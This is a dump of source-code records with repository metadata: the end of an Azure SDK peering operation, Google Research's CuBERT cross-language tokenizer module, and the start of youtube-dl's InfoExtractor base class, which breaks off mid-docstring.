_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
peering_parameters, # type: "_models.ExpressRouteCrossConnectionPeering"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.ExpressRouteCrossConnectionPeering"]
"""Creates or updates a peering in the specified ExpressRouteCrossConnection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cross_connection_name: The name of the ExpressRouteCrossConnection.
:type cross_connection_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:param peering_parameters: Parameters supplied to the create or update
ExpressRouteCrossConnection peering operation.
:type peering_parameters: ~azure.mgmt.network.v2020_11_01.models.ExpressRouteCrossConnectionPeering
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ExpressRouteCrossConnectionPeering or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_11_01.models.ExpressRouteCrossConnectionPeering]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ExpressRouteCrossConnectionPeering"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
cross_connection_name=cross_connection_name,
peering_name=peering_name,
peering_parameters=peering_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ExpressRouteCrossConnectionPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
| [
"[email protected]"
] | |
5f5dde92fc0731fe57b059f701415c7b9373889a | 21579091a548f9ee5dd085050c5627811d27c22b | /cubert/unified_tokenizer.py | 065f1eedc313ae3c86e52c7a18c96c8f38a8d544 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | lethaiq/google-research | 0e78ab28d153709d12efcfafdec189d86f5200af | 8f1c8664a1423aa734218ab7e34997dcf01341ce | refs/heads/master | 2022-12-16T05:52:45.912470 | 2020-09-16T16:36:38 | 2020-09-16T16:36:38 | 295,827,269 | 0 | 0 | null | 2020-09-15T19:19:12 | 2020-09-15T19:19:12 | null | UTF-8 | Python | false | false | 29,313 | py | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Cross-language tokenization library."""
import enum
import token as python_token
import tokenize
from typing import List, Mapping, Sequence, Text, Tuple
from absl import logging
import dataclasses
import regex # Using instead of `re` because it handles Unicode classes.
import six
# Log level of pedantic messages.
_PEDANTIC = 5
# Punctuation for tokenization.
SENTINEL = '^'
SENTINEL_ESCAPE = 'CARET'
@enum.unique
class TokenKind(enum.Enum):
"""The kind of language-agnostic tokens."""
NONE = 0 # Sadly, Python2 doesn't support enum.auto()
PUNCTUATION = 1
KEYWORD = 2
IDENTIFIER = 3
STRING = 4
COMMENT = 5
NEWLINE = 6
EOS = 7
ERROR = 8
NUMBER = 9
WHITESPACE = 10
@dataclasses.dataclass(frozen=True)
class TokenMetadata():
pass
@dataclasses.dataclass(frozen=True)
class AbstractToken():
spelling: str
kind: TokenKind
metadata: TokenMetadata
@dataclasses.dataclass(frozen=True)
class AbstractMultiToken():
# We force `spellings` to be a concrete `Tuple`, to simplify equality checks
# and hashing. Otherwise, `spellings=[1, 2, 3]` and `spellings=(1, 2, 3)`
# would result in different multi-tokens.
spellings: Tuple[str]
kind: TokenKind
metadata: TokenMetadata
def multi_token_from_token(token):
return AbstractMultiToken(spellings=(token.spelling,),
kind=token.kind,
metadata=token.metadata)
_KINDS_TO_SPLIT_LIKE_WHITESPACE = (TokenKind.COMMENT, TokenKind.STRING,
TokenKind.WHITESPACE)
_KINDS_TO_SPLIT_BY_LENGTH = (TokenKind.COMMENT, TokenKind.STRING,
TokenKind.NUMBER, TokenKind.IDENTIFIER,
TokenKind.WHITESPACE)
_UPPERCASE = r'\p{Lu}'
_TITLECASE = r'\p{Lt}'
# Here we abuse the term "lowercase", by using it to refer to anything that
# doesn't cause a camel/Pascal case split. For Python, for example, this
# includes Unicode category Nd ("decimal numbers") and Nl ("number letters").
# We assume that before these regular expressions are applied, any
# characters that don't fall into a legal "other" category have been checked.
_LOWERCASE = r'[^\p{Lu}\p{Lt}]'
# In what follows, L, U, and T will be replaced with _LOWERCASE, _UPPERCASE
# and _TITLECASE later.
_CAMEL_AFTER_SNAKE_EXPRESSIONS = [
# Beginning lowercase.
r'^{L}+',
# A single titlecase followed by 0 or more lowercase.
r'{T}{L}*',
# Single uppercase followed by multiple lowercase.
r'{U}{L}+',
# Multiple uppercase ending right before a titlecase.
r'{U}+(?={T})',
# Multiple uppercase ending right before an uppercase followed by lowercase.
r'{U}+(?={U}{L})',
# Multiple uppercase to the end.
r'{U}+$',
]
_CAMEL_AFTER_SNAKE_EXPRESSION = '|'.join(_CAMEL_AFTER_SNAKE_EXPRESSIONS).format(
L=_LOWERCASE,
T=_TITLECASE,
U=_UPPERCASE)
_CAMEL_RE = regex.compile(_CAMEL_AFTER_SNAKE_EXPRESSION, regex.U) # pytype: disable=module-attr
class StateType(enum.IntEnum):
INITIAL_STATE = 0
UPPERCASE_STATE = 1
LOWERCASE_STATE = 2
NUMBER_STATE = 3
SPECIAL_STATE = 4
def code_to_tokens(code):
"""Convert Python source code to list of tokens.
Removes all trailing whitespace and then tokenizes the text as if it were
Python source code. Tokens are 5-tuples as used by the built-in tokenize
module.
Args:
code: string containing python source code
Returns:
The code represented as a string of packed tokens separated by spaces.
Raises:
tokenize.TokenError: When a multi-line token is incomplete. This is
generated by `tokenize.generate_tokens`.
IndentationError: When the source code is incorrectly indented. This is
generated by `tokenize.generate_tokens`.
"""
token_tuples = list(tokenize.generate_tokens(
six.StringIO(code.rstrip()).readline))
logging.vlog(5, 'Code `%s` was tokenized to token tuples `%s`.', code,
token_tuples)
# Now we get rid of an extraneous trailing newline token, if it has been
# produced. This is a difference in the behavior of generate_tokens between
# Python 2 and Python 3.
if six.PY3:
if len(token_tuples) > 1:
if token_tuples[-2][0] == python_token.NEWLINE:
del token_tuples[-2]
logging.vlog(5, 'Tokenization for `%s` was sanitized. Now token tuples '
'are `%s`.', code, token_tuples)
# Another similar failure mode is if the final tokens are DEDENT, there may
# be an extraneous newline before them.
if len(token_tuples) > 2:
current = len(token_tuples) - 2 # Right before ENDMARKER.
while current and token_tuples[current][0] == tokenize.DEDENT:
current -= 1
if current and token_tuples[current][0] == tokenize.NEWLINE:
del token_tuples[current]
logging.vlog(5, 'Tokenization for `%s` was sanitized to remove '
'trailing newline after DEDENTs. Now token tuples are '
'`%s`.', code, token_tuples)
return token_tuples
def code_to_tokens_simple_lossless(code):
r"""Convert python source code to list of tokens.
This is a simple version using spacing and different classes of characters to
tokenize a string.
A sentence will be split at "|" in the following patterns:
upper | upper lower
upper | number
upper | special
lower | upper
lower | number
lower | special
number | upper
number | lower
number | special
special | upper
special | lower
special | number
In addition to splits caused by the type changes above, the code is also split
at whitespace. However, a sequence of spaces or tabs will not be split unless
its length is longer than 20.
For example: "12345 \n\n678" -> ["12345", " ", "\n", "\n", "678"]
We do not split sequences of spaces/tabs to avoid long sequences of single
" " or "\t" tokens caused by deep indentation.
This tokenizer uses a finite state machine. The definition of the states is in
the StateType class.
Args:
code: String containing Python source code.
Returns:
The code represented as a string of tokens separated by spaces.
For example, "foo ,1" -> ["foo", " ", ",", "1"]
"""
# normal state transitions that will result in splitting
normal_transitions = [
(StateType.UPPERCASE_STATE, StateType.NUMBER_STATE),
(StateType.UPPERCASE_STATE, StateType.SPECIAL_STATE),
(StateType.LOWERCASE_STATE, StateType.UPPERCASE_STATE),
(StateType.LOWERCASE_STATE, StateType.NUMBER_STATE),
(StateType.LOWERCASE_STATE, StateType.SPECIAL_STATE),
(StateType.NUMBER_STATE, StateType.UPPERCASE_STATE),
(StateType.NUMBER_STATE, StateType.LOWERCASE_STATE),
(StateType.NUMBER_STATE, StateType.SPECIAL_STATE),
(StateType.SPECIAL_STATE, StateType.UPPERCASE_STATE),
(StateType.SPECIAL_STATE, StateType.LOWERCASE_STATE),
(StateType.SPECIAL_STATE, StateType.NUMBER_STATE)]
# output, state
tokens = []
state = StateType.INITIAL_STATE
next_state = None
memory = []
for i, inputchar in enumerate(code):
if inputchar.isupper():
next_state = StateType.UPPERCASE_STATE
elif inputchar.islower():
next_state = StateType.LOWERCASE_STATE
elif inputchar.isdigit():
next_state = StateType.NUMBER_STATE
else:
next_state = StateType.SPECIAL_STATE
# splitting cases
if (state, next_state) in normal_transitions:
tokens.append(''.join(memory))
memory = []
elif (state, next_state) == (StateType.UPPERCASE_STATE,
StateType.LOWERCASE_STATE) and len(memory) > 1:
tokens.append(''.join(memory[:-1]))
memory = [memory[-1]]
elif (state, next_state) == (StateType.SPECIAL_STATE,
StateType.SPECIAL_STATE):
if inputchar in [' ', '\t'] and inputchar == code[i-1]:
if len(memory) >= 20:
tokens.append(''.join(memory))
memory = []
elif inputchar.isspace() or code[i-1].isspace():
tokens.append(''.join(memory))
memory = []
# put inputchar into memory, always
memory.append(inputchar)
state = next_state
if memory:
tokens.append(''.join(memory))
return tokens
def subtokenize_identifier(identifier):
"""Splits an identifier assuming camel/pascal/snake case conventions.
This doesn't attempt to classify the identifier as one of snake case/camel/
pascal, etc. It just applies all possible splits in the order snake case,
Pascal, camel.
This doesn't check whether an identifier is a legal identifier for some
language. It is assumed that the caller has already decided that.
For Unicode characters in identifiers, we define splitting conventions as
follows:
- Snake-case is only defined in terms of the ASCII underscore (U+005F). Other
characters that may look like an underscore do not introduce a snake-case
component.
- For the purpose of Pascal and camel cases, we categorize only the Lu Unicode
category as uppercase characters, with the exception of the Lt (titlecase)
character category. Lt characters are treated as a sequence of an uppercase
character followed by a lowercase character and, as such, may only appear
in the beginning of a Pascal-case component, but not as an all-uppercase
component. As an example, if U, L, T are uppercase, lowercase, and titlecase
characters as defined above (i.e., members of Lu, everything else, or Lt
categories, respectively), UUUT would be split as UUU and T, ULTL would be
split as UL and TL, LTL would be split as L and TL, etc.
Args:
identifier: A non-empty string, purporting to be an identifier. Assumes its
validity as an identifier in a given language has already been established
by the caller.
Returns:
A list of substrings of `identifier`. Joining the substrings should return
the original `identifier` exactly.
Raises:
ValueError: if `identifier` is not a legal identifier string.
"""
snake_splits = identifier.split('_')
snake_components = [] # type: List[Text]
current_snake_separator = [] # type: List[Text]
for snake_split in snake_splits:
if snake_split:
snake_components.append(''.join(current_snake_separator))
current_snake_separator = []
snake_components.append(snake_split)
current_snake_separator.append('_')
# Emit the final separator, but discard the most recent underscore added to
# it. It should have at least one.
current_snake_separator.pop()
if current_snake_separator:
snake_components.append(''.join(current_snake_separator))
# Now we want to do camel-case splitting for each non-underscore snake
# component.
logging.vlog(_PEDANTIC, 'Split %r into snake case: %r', identifier,
snake_components)
all_components = [] # type: List[Text]
for snake_component in snake_components:
if '_' in snake_component:
all_components.append(snake_component)
else:
unicodified_snake_component = six.ensure_text(snake_component)
camel_components = _CAMEL_RE.findall(unicodified_snake_component)
logging.vlog(_PEDANTIC, 'Split snake component %r into %r components.',
unicodified_snake_component, camel_components)
all_components.extend(camel_components)
# Finally, we want to combine the underscore components with the component
# immediately preceding them.
non_underscore_component = ''
final_components = [] # type: List[Text]
for component in all_components:
if '_' in component:
# Found an underscore component. Combine it with the previous non-
# underscore component (if any), emit it, and clear the remembered
# non-underscore component.
combined_component = non_underscore_component + component
final_components.append(combined_component)
non_underscore_component = ''
else:
# This is a non-underscore component.
if non_underscore_component:
# We've found two consecutive non-underscore components. Emit the
# previous one, since it won't be combined with any underscores.
final_components.append(non_underscore_component)
# Remember the current non-underscore component, in case we need to
# combine it with a following underscore.
non_underscore_component = component
# We may have collected the final non-underscore component and it wasn't
# followed by underscores. Just emit it.
if non_underscore_component:
final_components.append(non_underscore_component)
assert (six.ensure_text(
''.join(final_components)) == six.ensure_text(identifier)), (
'Ended up with different identifier when joinining components %r '
'into combined %r.' % (final_components, identifier))
return final_components
def sanitize(t, mappings):
r"""Sanitizes a token to remove "dangerous" characters, like \n and \r."""
final = t
for original, sanitized in mappings.items():
assert len(original) == 1
final = final.replace(original, sanitized)
return final
def unsanitize(t, mappings):
"""Unsanitizes a previously sanitized token."""
final = t
for original, sanitized in mappings.items():
assert len(original) == 1
final = final.replace(sanitized, original)
return final
def split_long_token(token_string,
max_output_token_length):
"""Splits a token losslessly to some maximum length per component.
A long token is split into multiple tokens. For instance, `'bcd'` with
`max_output_token_length=2` will become `['bc', 'd']`. No sentinel or other
split mark is added at this stage.
A token is assumed to be non-empty.
Args:
token_string: The token.
max_output_token_length: Maximum length of an output token.
Returns:
List of split tokens.
Raises:
ValueError: if `token` is empty.
"""
if not token_string:
raise ValueError('Expected %r to be non-empty' % token_string)
whole_token_length = len(token_string)
remainder_length = whole_token_length % max_output_token_length
even_parts = list(
map(
# ...join together...
''.join,
zip(
# `max_output_token_length` copies of the iterator of
# whole_token's characters. zip will draw from the same iterator
# and return `max_output_token_length` tuples of characters from
# `whole_token`.
*[iter(token_string)] * max_output_token_length)))
remainder_part = ([token_string[-remainder_length:]]
if remainder_length else [])
split_token = even_parts + remainder_part
assert split_token, ('while wrapping >>%s<< into >%r<' %
(token_string, split_token))
assert all([
len(t) <= max_output_token_length for t in split_token
]), ('Got split_token >>>%r<<<, which contains tokens longer than %d.' %
(split_token, max_output_token_length))
return split_token
def _agnostic_tokens_to_lists_of_token_lists(
agnostic_tokens
):
"""Turns each token into a singleton token list, keeping token kinds."""
return [multi_token_from_token(a) for a in agnostic_tokens]
def _subtokenize_identifiers_heuristically(
token_lists
):
"""Subtokenizes only identifiers in a list of token lists.
This assumes that every subtoken list is still a singleton.
Args:
token_lists: A list of labelled tokens. Each token is represented as a
(still) singleton list of subtokens.
Returns:
A list of token lists, of which the identifiers are split heuristically.
"""
with_split_identifiers: List[AbstractMultiToken] = []
for multi_token in token_lists:
# spelling_list had better still be a singleton.
assert len(multi_token.spellings) == 1, (
'Expected %r to be a singleton, but it is not.' % multi_token)
if multi_token.kind is TokenKind.IDENTIFIER:
subtokenized = dataclasses.replace(
multi_token,
spellings=subtokenize_identifier(multi_token.spellings[0]))
with_split_identifiers.append(subtokenized)
else:
with_split_identifiers.append(multi_token)
return with_split_identifiers
def _subtokenize_strings_heuristically(
token_lists
):
"""Splits STRING, COMMENT, WHITESPACE tokens like text.
Args:
token_lists: List of subtoken lists, of which only those of kind IDENTIFIER
are allowed not to be singletons.
Returns:
A list of token lists, of which IDENTIFIER, STRING, NUMBER, COMMENT tokens
are now split heuristically.
"""
with_heuristically_split_text: List[AbstractMultiToken] = []
for multi_token in token_lists:
if multi_token.kind in _KINDS_TO_SPLIT_LIKE_WHITESPACE:
assert len(multi_token.spellings) == 1, (
'Expected %r to be a singleton, but it is not.' % multi_token)
subtokenized = dataclasses.replace(
multi_token,
spellings=code_to_tokens_simple_lossless(multi_token.spellings[0]))
with_heuristically_split_text.append(subtokenized)
else:
with_heuristically_split_text.append(multi_token)
return with_heuristically_split_text
def _shorten_subtokens(
token_lists,
max_output_token_length,
):
"""Further subtokenizes any subtokens that are too long.
At this point, we're done with all heuristic splitting. Now split what's left
by length if need be. We don't do anything about keywords or other
punctuation.
Args:
token_lists: List of subtoken lists, of which only those of kinds
IDENTIFIER, NUMBER, STRING, COMMENT may have been subtokenized.
max_output_token_length: The max character length for each subtoken of
the subtokenizable kinds.
Returns:
Subtokenized tokens up to a maximum per-subtoken length.
"""
shortened_subtokens: List[AbstractMultiToken] = []
for multi_token in token_lists:
if multi_token.kind in _KINDS_TO_SPLIT_BY_LENGTH:
shortened_spelling_list: List[str] = []
for spelling in multi_token.spellings:
shortened_spelling_list.extend(
split_long_token(spelling, max_output_token_length))
shortened_subtokens.append(
dataclasses.replace(
multi_token, spellings=tuple(shortened_spelling_list)))
else:
shortened_subtokens.append(multi_token)
return shortened_subtokens
def split_agnostic_tokens(
agnostic_tokens,
max_output_token_length,
):
"""Splits each language-agnostic token according to its kind.
Args:
agnostic_tokens: The language-agnostic tokens to subtokenize. These are
pairs of spelling and generic token kind. No subtokenization has been
done; the tokens are as the language-specific lexer produced them.
max_output_token_length: The target maximum output token length.
Returns:
A list of subtoken lists, with their associated token kind.
"""
# Prepare for subtokenization.
agnostic_token_lists = _agnostic_tokens_to_lists_of_token_lists(
agnostic_tokens)
# Perform heuristic subtokenizations.
with_identifiers_heuristically_split = _subtokenize_identifiers_heuristically(
agnostic_token_lists)
with_string_tokens_heuristically_split = _subtokenize_strings_heuristically(
with_identifiers_heuristically_split)
# Shorten resulting subtokens by length.
shortened_subtokens = _shorten_subtokens(
with_string_tokens_heuristically_split, max_output_token_length)
return shortened_subtokens
def sanitize_subtoken_lists(
subtoken_lists,
sanitization_mapping,
sentinel):
"""Sanitizes lists of subtoken lists, adding sentinels.
Args:
subtoken_lists: A list of subtoken lists, one list per initial language
token. Cannot be empty or contain empty sublists.
sanitization_mapping: A mapping from sensitive characters to replacement
strings. It is assumed to have been checked by `check_mappings`.
sentinel: The sentinel character. It is expected to be one of the keys
in `sanitization_mapping`.
Returns:
A list of subtoken lists representing the entire original sequence.
Raises:
ValueError: If one of the input sublists is empty, or the entire input
is empty, or the sentinel is not one of the unsanitary characters.
"""
if not subtoken_lists:
raise ValueError('Received empty input %r but expected it to be non '
'empty' % subtoken_lists)
if sentinel not in sanitization_mapping:
raise ValueError('Sentinel %r should be in the sanitization map %r '
'but is not.' % (sentinel, sanitization_mapping))
sanitized_lists = []
for spelling_list in subtoken_lists:
if not spelling_list:
raise ValueError('Received empty sublist %r but expected no sublist '
'to be empty' % subtoken_lists)
sanitized_list = [
sanitize(t, sanitization_mapping)
for t in spelling_list
]
# Add the sentinel to all subtokens except the last one.
with_sentinel = [
t + sentinel for t in sanitized_list[:-1]] + [sanitized_list[-1]]
sanitized_lists.append(with_sentinel)
return sanitized_lists
def flatten_subtoken_lists(
subtoken_lists):
"""Flattens lists of subtoken lists.
Args:
subtoken_lists: A list of subtoken lists, one list per initial language
token. Cannot be empty or contain empty sublits.
Returns:
A list of flattened subtokens representing the entire original sequence.
Raises:
ValueError: If the input is empty.
"""
if not subtoken_lists:
raise ValueError('Received empty input %r but expected it to be non '
'empty' % subtoken_lists)
subtokens = sum(subtoken_lists, [])
return subtokens
def flatten_and_sanitize_subtoken_lists(
subtoken_lists,
sanitization_mapping,
sentinel):
"""Sanitizes and then flattens lists of subtoken lists, adding sentinels.
Args:
subtoken_lists: A list of subtoken lists, one list per initial language
token. Cannot be empty or contain empty sublits.
sanitization_mapping: A mapping from sensitive characters to replacement
strings. It is assumed to have been checked by `check_mappings`.
sentinel: The sentinel character. It is expected to be one of the keys
in `sanitization_mapping`.
Returns:
A list of flattened subtokens representing the entire original sequence.
Raises:
ValueError: If one of the input sublists is empty, or the entire input
is empty, or the sentinel is not one of the unsanitary characters.
"""
sanitized = sanitize_subtoken_lists(subtoken_lists, sanitization_mapping,
sentinel)
flattened = flatten_subtoken_lists(sanitized)
return flattened
def reconstitute_full_unsanitary_tokens(
split_token_list,
sanitization_mapping,
sentinel):
"""Unsplits tokens previously subtokenized and flattened.
It assumes this is the output of `split_agnostic_tokens`, followed by
`sanitize_subtoken_lists` and `flatten_subtoken_lists`.
Split tokens are joined together. `['bc^', 'd']` will become
`'bcd'`, where '^' is `SENTINEL` that indicates where joining occurs.
Args:
split_token_list: List of split tokens.
sanitization_mapping: A mapping from sensitive characters to replacement
strings. It is assumed to have been checked by `check_mappings`.
sentinel: The sentinel character. It is expected to be one of the keys
in `sanitization_mapping`.
Returns:
Sequence of whole tokens.
Raises:
ValueError: if the sentinel character appears in any position other than
the sentinel position, or if any of the unsanitary characters (as per
the `sanitization_mapping`) appear anywhere, or if a subtoken is empty,
or the sentinel is not one of the unsanitary characters.
"""
if not split_token_list:
raise ValueError('Received empty input %r but expected it to be non '
'empty.' % split_token_list)
if sentinel not in sanitization_mapping:
raise ValueError('Sentinel %r should be in the sanitization map %r '
'but is not.' % (sentinel, sanitization_mapping))
whole_token_list = [] # type: List[Text]
pending_split_tokens = [] # type: List[Text]
for t in split_token_list:
if not t:
raise ValueError('Must have non-empty subtokens, but found %r in %r.' % (
t, split_token_list))
if t[-1] == sentinel:
# Remove sentinel and accumulate until the final one appears.
pending_split_tokens.append(t[:-1])
else:
# It is a final token, so combine everything accumulated into one.
pending_split_tokens.append(t)
whole_token = ''.join(pending_split_tokens)
whole_token_list.append(whole_token)
pending_split_tokens = []
# We should have nothing pending.
if pending_split_tokens:
raise ValueError('After scanning all subtokens %r, there still is some '
'unjoined content: %r' %
(split_token_list, pending_split_tokens))
# At this point we have whole tokens that contain sanitized characters. First
# we'll see if they are dirty, and then unsanitize them into their original
# form.
unsanitary_characters = sanitization_mapping.keys()
for whole_token in whole_token_list:
for unsanitary_character in unsanitary_characters:
if unsanitary_character in whole_token:
raise ValueError('Reconstructed whole token %r seems to contain a '
'character %r that should have been sanitized '
'already.' % (whole_token, unsanitary_character))
# Unsanitize.
unsanitized_whole_tokens = [
unsanitize(t, sanitization_mapping) for t in whole_token_list
]
return unsanitized_whole_tokens
def check_mappings(mappings):
"""Checks the correctness of character-to-string sanitization mappings.
This ensures that all keys are single characters and that no value contains
any of the keys or other values.
Args:
mappings: A mapping from characters to strings.
Raises:
ValueError: If a key has length different from 1 or if a key appears in any
value or if a value is a substring of another value, or if any value is
empty or non-unique.
"""
for key in mappings:
if len(key) != 1:
raise ValueError('Expecting length-1 strings as keys in mappings, but '
'got key %r in mappings %r.' % (key, mappings))
values = mappings.values()
if len(values) != len(set(values)):
raise ValueError('There seem to be some duplicate values in %r, but they '
'are expected to be unique.' % mappings)
if any([not value for value in values]):
raise ValueError('An empty value found in %r, but no empty values are '
'allowed.' % mappings)
for value in values:
for other_value in values:
if value != other_value and value in other_value:
raise ValueError('Value %r is a substring of %r, but no value may '
'be a substring of another.' % (value, other_value))
for key in mappings:
if key in value:
raise ValueError('No key may appear in one of the mapping values, but '
'found key %r in value %r, both of which appear in '
'the mappings %r.' % (key, value, mappings))
def subtokenize_agnostic_tokens_in_place(
agnostic_tokens,
max_output_token_length,
sanitization_mapping,
sentinel,
):
"""Subtokenizes language-agnostic tokens, discarding their kind in the end.
Args:
agnostic_tokens: The language-agnostic tokens to subtokenize. These are
pairs of spelling and generic token kind. No subtokenization has been
done; the tokens are as the language-specific lexer produced them.
max_output_token_length: The target maximum output token length.
sanitization_mapping: A mapping from sensitive characters to replacement
strings. It is assumed to have been checked by `check_mappings`.
sentinel: The sentinel character. It is expected to be one of the keys
in `sanitization_mapping`.
Returns:
A list of subtoken lists, one per original agnostic token.
"""
labelled_subtokenized = split_agnostic_tokens(agnostic_tokens,
max_output_token_length)
unlabelled_subtokenized = [
t.spellings for t in labelled_subtokenized
]
subtoken_lists = sanitize_subtoken_lists(unlabelled_subtokenized,
sanitization_mapping,
sentinel)
return subtoken_lists
| [
"[email protected]"
] | |
aa465a02610476af0dba1e81cf7e50be67ac7255 | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/rg3_youtube-dl/youtube-dl-master/youtube_dl/extractor/common.py | eb3c091aaab5d84ab8972003877ffd1d38827fca | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 114,911 | py | from __future__ import unicode_literals
import base64
import datetime
import hashlib
import json
import netrc
import os
import random
import re
import socket
import sys
import time
import math
from ..compat import (
compat_cookiejar,
compat_cookies,
compat_etree_fromstring,
compat_getpass,
compat_http_client,
compat_os_name,
compat_str,
compat_urllib_error,
compat_urllib_parse_unquote,
compat_urllib_parse_urlencode,
compat_urllib_request,
compat_urlparse,
)
from ..downloader.f4m import remove_encrypted_media
from ..utils import (
NO_DEFAULT,
age_restricted,
base_url,
bug_reports_message,
clean_html,
compiled_regex_type,
determine_ext,
error_to_compat_str,
ExtractorError,
fix_xml_ampersands,
float_or_none,
GeoRestrictedError,
GeoUtils,
int_or_none,
js_to_json,
parse_iso8601,
RegexNotFoundError,
sanitize_filename,
sanitized_Request,
unescapeHTML,
unified_strdate,
unified_timestamp,
url_basename,
xpath_element,
xpath_text,
xpath_with_ns,
determine_protocol,
parse_duration,
mimetype2ext,
update_Request,
update_url_query,
parse_m3u8_attributes,
extract_attributes,
parse_codecs,
urljoin,
)
class InfoExtractor(object):
"""Information Extractor class.
Information extractors are the classes that, given a URL, extract
information about the video (or videos) the URL refers to. This
information includes the real video URL, the video title, author and
others. The information is stored in a dictionary which is then
passed to the YoutubeDL. The YoutubeDL processes this
information possibly downloading the video to the file system, among
other possible outcomes.
The type field determines the type of the result.
By far the most common value (and the default if _type is missing) is
"video", which indicates a single video.
For a video, the dictionaries must include the following fields:
id: Video identifier.
title: Video title, unescaped.
Additionally, it must contain either a formats entry or a url one:
formats: A list of dictionaries for each format available, ordered
from worst to best quality.
Potential fields:
* url Mandatory. The URL of the video file
* manifest_url
The URL of the manifest file in case of
fragmented media (DASH, hls, hds)
* ext Will be calculated from URL if missing
* format A human-readable description of the format
("mp4 container with h264/opus").
Calculated from the format_id, width, height.
and format_note fields if missing.
* format_id A short description of the format
("mp4_h264_opus" or "19").
Technically optional, but strongly recommended.
* format_note Additional info about the format
("3D" or "DASH video")
* width Width of the video, if known
* height Height of the video, if known
* resolution Textual description of width and height
* tbr Average bitrate of audio and video in KBit/s
* abr Average audio bitrate in KBit/s
* acodec Name of the audio codec in use
* asr Audio sampling rate in Hertz
* vbr Average video bitrate in KBit/s
* fps Frame rate
* vcodec Name of the video codec in use
* container Name of the container format
* filesize The number of bytes, if known in advance
* filesize_approx An estimate for the number of bytes
* player_url SWF Player URL (used for rtmpdump).
* protocol The protocol that will be used for the actual
download, lower-case.
"http", "https", "rtsp", "rtmp", "rtmpe",
"m3u8", "m3u8_native" or "http_dash_segments".
* fragment_base_url
Base URL for fragments. Each fragment's path
value (if present) will be relative to
this URL.
* fragments A list of fragments of a fragmented media.
Each fragment entry must contain either an url
or a path. If an url is present it should be
considered by a client. Otherwise both path and
fragment_base_url must be present. Here is
the list of all potential fields:
* "url" - fragment's URL
* "path" - fragment's path relative to
fragment_base_url
* "duration" (optional, int or float)
* "filesize" (optional, int)
* preference Order number of this format. If this field is
present and not None, the formats get sorted
by this field, regardless of all other values.
-1 for default (order by other properties),
-2 or smaller for less than default.
< -1000 to hide the format (if there is
another one which is strictly better)
* language Language code, e.g. "de" or "en-US".
* language_preference Is this in the language mentioned in
the URL?
10 if it's what the URL is about,
-1 for default (don't know),
-10 otherwise, other values reserved for now.
* quality Order number of the video quality of this
format, irrespective of the file format.
-1 for default (order by other properties),
-2 or smaller for less than default.
* source_preference Order number for this video source
(quality takes higher priority)
-1 for default (order by other properties),
-2 or smaller for less than default.
* http_headers A dictionary of additional HTTP headers
to add to the request.
* stretched_ratio If given and not 1, indicates that the
video's pixels are not square.
width : height ratio as float.
* no_resume The server does not support resuming the
(HTTP or RTMP) download. Boolean.
url: Final video URL.
ext: Video filename extension.
format: The video format, defaults to ext (used for --get-format)
player_url: SWF Player URL (used for rtmpdump).
The following fields are optional:
alt_title: A secondary title of the video.
display_id An alternative identifier for the video, not necessarily
unique, but available before title. Typically, id is
something like "4234987", title "Dancing naked mole rats",
and display_id "dancing-naked-mole-rats"
thumbnails: A list of dictionaries, with the following entries:
* "id" (optional, string) - Thumbnail format ID
* "url"
* "preference" (optional, int) - quality of the image
* "width" (optional, int)
* "height" (optional, int)
